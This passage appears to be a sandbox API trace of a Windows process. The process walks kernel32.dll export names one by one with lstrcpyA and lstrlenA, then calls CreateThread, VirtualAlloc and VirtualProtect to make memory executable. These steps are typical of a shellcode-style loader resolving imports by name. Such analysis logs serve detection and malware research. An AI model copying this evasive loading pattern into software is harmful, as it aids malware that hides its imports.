(in: lpString1=0x8decf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0158.062] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0158.062] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0158.062] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0158.062] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0158.062] lstrlenA (lpString="CREATEJOBSET") returned 12 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0158.062] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0158.062] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0158.063] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0158.063] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0158.063] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0158.063] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0158.063] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0158.063] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0158.063] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0158.063] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0158.063] lstrlenA (lpString="CREATEPIPE") returned 10 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0158.063] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0158.063] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0158.063] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.063] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0158.063] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0158.063] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0158.063] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0158.063] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0158.063] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0158.063] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0158.063] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0158.064] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0158.064] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0158.064] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0158.064] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0158.064] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0158.064] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0158.064] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0158.064] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0158.064] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0158.064] lstrcpyA (in: lpString1=0x8decf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0158.064] lstrlenA (lpString="CREATETHREAD") returned 12 [0158.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe6620, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc4 [0158.065] RtlExitUserThread (Status=0x0) Thread: id = 249 os_tid = 0x6ac [0158.074] VirtualProtect (in: lpAddress=0xb0000, dwSize=0x254, flNewProtect=0x4, lpflOldProtect=0x239fe9c | out: lpflOldProtect=0x239fe9c*=0x40) returned 1 [0158.074] VirtualProtect (in: lpAddress=0xb0000, dwSize=0x254, flNewProtect=0x40, lpflOldProtect=0x239fea0 | out: lpflOldProtect=0x239fea0*=0x4) returned 1 [0158.081] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0158.088] VirtualAlloc (lpAddress=0x0, dwSize=0x101, flAllocationType=0x3000, flProtect=0x4) returned 0x90000 [0158.088] lstrlenA (lpString="kernel32.dll") returned 12 [0158.088] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0158.088] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0158.088] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0158.088] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0158.088] lstrlenA (lpString="ADDATOMA") returned 8 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0158.088] lstrlenA (lpString="ADDATOMW") returned 8 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0158.088] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0158.088] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0158.088] lstrcpyA (in: lpString1=0x239f180, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0158.088] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0158.089] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0158.089] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0158.089] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0158.089] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0158.089] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0158.089] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0158.089] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0158.089] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0158.089] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0158.089] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0158.089] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0158.089] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0158.089] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0158.089] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0158.089] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0158.089] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0158.089] lstrlenA (lpString="BACKUPREAD") returned 10 [0158.089] lstrcpyA (in: lpString1=0x239f180, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0158.089] lstrlenA (lpString="BACKUPSEEK") returned 10 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0158.090] lstrlenA (lpString="BACKUPWRITE") returned 11 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0158.090] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0158.090] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0158.090] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0158.090] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0158.090] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0158.090] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0158.090] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0158.090] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0158.090] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0158.090] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0158.090] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0158.090] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0158.090] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0158.090] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0158.090] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0158.090] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0158.090] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0158.090] lstrcpyA (in: lpString1=0x239f180, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0158.091] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0158.091] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0158.091] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0158.091] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0158.091] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0158.091] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0158.091] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0158.091] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0158.091] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0158.091] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0158.091] lstrlenA (lpString="BEEP") returned 4 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0158.091] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0158.091] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0158.091] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0158.091] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0158.091] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0158.091] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0158.091] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0158.091] lstrcpyA (in: lpString1=0x239f180, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0158.092] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0158.092] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0158.092] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0158.092] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0158.092] lstrlenA (lpString="CANCELIO") returned 8 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0158.092] lstrlenA (lpString="CANCELIOEX") returned 10 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0158.092] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0158.092] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0158.092] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0158.092] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0158.092] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0158.092] lstrlenA (lpString="CHECKELEVATION") returned 14 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0158.092] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0158.092] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0158.092] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0158.092] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0158.092] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0158.092] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0158.092] lstrcpyA (in: lpString1=0x239f180, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0158.093] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0158.093] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0158.093] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0158.093] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0158.093] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0158.093] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0158.093] lstrcpyA (in: lpString1=0x239f180, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0158.093] lstrlenA 